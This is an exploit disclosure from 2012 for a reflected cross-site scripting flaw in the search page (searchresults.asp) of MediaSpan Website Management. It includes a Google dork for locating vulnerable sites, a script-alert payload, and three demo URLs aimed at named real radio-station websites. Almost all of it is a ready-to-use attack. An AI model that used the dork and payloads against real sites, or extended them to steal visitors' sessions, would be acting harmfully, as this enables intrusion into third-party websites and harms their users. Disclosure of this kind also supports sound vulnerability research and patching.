###################################################################################

# Exploit Title: MediaSpan Website Management Cross Site Scripting Vulnerability
#
# Google Dork: intext:":Copyright © 2012 CUMULUS MEDIA and MediaSpan"
#
# Date: 08/24/2012
#
# Author: Crim3R
#
# Vendor Home : http://www.mediaspanonline.com/products/websitemanagement/
#
# Tested on: all
#
###################################################################################

 
========================================
there is an xss in searchresults.asp
go to search page and put this (or any html code) in search form
<script>alert(1);</script>  
========================================
D3M0 : 
http://khop.com/searchresults.asp?search=1&LOOKFOR=&searchFor=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&keyword=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E


http://www.993kjoy.com/searchresults.asp?search=1&LOOKFOR=&searchFor=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E++&keyword=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E++


http://www.wabcradio.com/searchresults.asp?search=1&LOOKFOR=&searchFor=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E++&keyword=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E++


===============Crim3R@Att.Net===========

$home = %00
thanks to :  2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir